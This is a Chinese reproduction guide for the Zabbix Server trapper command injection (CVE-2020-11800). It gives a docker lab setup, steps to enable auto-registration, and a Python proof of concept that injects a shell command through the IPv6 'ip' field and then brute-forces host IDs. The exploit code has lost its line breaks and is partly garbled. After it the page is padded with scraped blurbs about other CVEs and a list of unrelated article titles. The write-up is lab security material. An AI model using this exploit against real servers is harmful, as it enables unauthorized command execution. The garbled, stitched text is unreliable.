(CVE-2020-11800)Zabbix_Server_trapper_命令注入漏洞

20210508


一、漏洞简介

Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构,可用于监视各种网络服务、 服务器和网络机器等状态。在[CVE-2017-2824][1]中,其Server端 trapper command 功能存在一处代码执行漏洞,而修复补丁并不完善,导致可以利用IPv6进行绕过,注入任意命令。


二、漏洞影响

Zabbix 3.0至3.0.30


三、复现过程

1. 环境搭建

执行如下命令

docker-compose up -d

启动一个完整的Zabbix环境,包含Web端、Server端、Agent和Mysql数据库。

docker-compose ps

查看容器是否全部成功启动,Web端8080端口

2. 漏洞复现

访问页面 http://yourip:8080

利用该漏洞的前提:服务端开启了自动注册功能,所以我们先以管理员的身份开启自动注册功能

(1)使用账号密码admin/zabbix登录后台,进入Configuration->Actions,将Event source调整为Auto registration

(2)然后点击Create action,创建一个Action,名字随便填,这里命名为test

(3)第三个标签页,创建一个Operation,Operation type是“Add Host”:保存。这样就开启了自动注册功能。


(4)新建的exp.py文件,POC代码:

import sys
import socket
import json
import sysdef send(ip, data):conn = socket.create_connection((ip, 10051), 10)conn.send(json.dumps(data).encode())data = conn.recv(2048)conn.close()return datatarget = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;touch /tmp/success2"}))
for i in range(10000, 10500):data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})if data and b'failed' not in data:print('hostid: %d' % i)print(data)

(5)在将新建的exp.py文件放置在kail中。写入

python3 exp.py xxx.xxx.xxx.xxx  #kail ip

当查看到如下结果时,则说明命令执行成功:

(6)进入server容器,可见/tmp/success2已成功创建:

(不成功,可尝试重新执行docker-compose up -d)

(CVE-2020-11800)Zabbix_Server_trapper_命令注入漏洞相关推荐

  1. java 漏洞挖掘_Apache Tika命令注入漏洞挖掘

    *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤. ...

  2. OpenSSH 命令注入漏洞通告(CVE-2020-15778,Openssh <=8.3p1)

    一.漏洞概要 2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开.OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者 ...

  3. 查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)

    OpenSSH命令注入漏洞复现(CVE-2020-15778) 目录 漏洞描述 漏洞等级 漏洞影响版本 漏洞复现 修复建议 ▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现.通 ...

  4. openssh漏洞_技术干货 | OpenSSH命令注入漏洞复现(CVE202015778)

    本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作! 欢迎各位添加 ...

  5. 对开源库 limdu 命令注入漏洞 (CVE-2020-4066) 的简要分析

     聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 开源库Limdu 的 trainBatch 函数中存在一个命令注入漏洞 (CVE-2020-4066). Limdu 是 Node.j ...

  6. 修改jar 注入_Apache Tika命令注入漏洞挖掘

    介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤.CVE是https://nvd.nist.gov/vuln/detail/CVE-2018-1335.由于Apache ...

  7. 最新系统漏洞--QSAN SANOS命令注入漏洞

    最新系统漏洞2021年10月21日 受影响系统: QSAN SANOS <= 2.0.0 (build 202012222000) 描述: CVE(CAN) ID: CVE-2021-32533 ...

  8. Foxit Reader(福昕阅读器)(CVE-2020-14425)命令注入漏洞复现

    0x00简介 Foxit Reader,是一套用来阅读PDF格式文件的软件,由福建福昕软件所研发:2009年9月3日推出3.1.1 Build 0901最新版本.Foxit Reader是一套自由使用 ...

  9. 导致命令注入漏洞的php函数,PHP安全-函数

    函数 在我写作本书的时候,http://www.gxlcms.com/列出了共3917个函数,其中包括一些类似函数的语法结构,在此我不准备把它们从函数中区分开来,而是把它作为函数看待. 由于函数数量很 ...

最新文章

  1. matlab fir工具箱,用MATLAB信號處理工具箱進行FIR濾波器設計的三種方法
  2. 图像处理之基础---周末戏说卷积
  3. 专题 17 SOCKET并发程序设计
  4. 【BZOJ4545】DQS的trie 后缀自动机+LCT
  5. 改造我们的学习:有钱不会花,抱着金库抓瞎
  6. Thread pool引起的程序连接数据库响应慢
  7. Spark自带的集群模式(Standalone),Spark/Spark-ha集群搭建
  8. 【Qt5.8】TypeError: Property 'asciify' of object Core问题解决办法
  9. centos修改磁盘uuid_为什么MySQL用uuid做主键会被骂?
  10. ubuntu dpkg
  11. qq浏览器网页翻译_如何通过Edge浏览器调用“谷歌翻译”,将整个网页翻译为中文...
  12. 51nod1355 斐波那契的最小公倍数
  13. 怎样编辑pdf文件?手把手教你如何使用PDF编辑器
  14. 数据库mysql视频马士兵,马士兵mysql视频的个人笔记
  15. springboot elementui vue商城微信小程序源码(毕设)开发讲解
  16. 在《自动化学报》搜无人机关键词可以看到这方面的论文
  17. 纳米数据世界杯数据,世界杯分组,世界杯赛程,世界杯实时比分api接口
  18. dataframe之按时间筛选数据
  19. 在程序中写一个“HelloJavaWorld你好世界“输出到操作系统文件Hello.txt文件中
  20. WxJava springboot微信支付商户直连分账使用总结

热门文章

  1. 【2022小米秋招(2023校招)】软件开发方向 笔试题1——链表反转
  2. matlab将一列数分割为若干组,将数据拆分为不同组并计算统计量
  3. LeetCode 0417「太平洋大西洋水流问题」
  4. 7-4 最短路径之Dijkstra(朴素dijkstra打印路径)
  5. Java学习笔记——Number类
  6. extern、struct等关键字
  7. java计算机毕业设计高原特色农产品网站设计MyBatis+系统+LW文档+源码+调试部署
  8. Hive坑之Where语句的“不等于”
  9. iptables禁止访问某个域名
  10. 量子计算机英语的ppt,量子计算机简介.ppt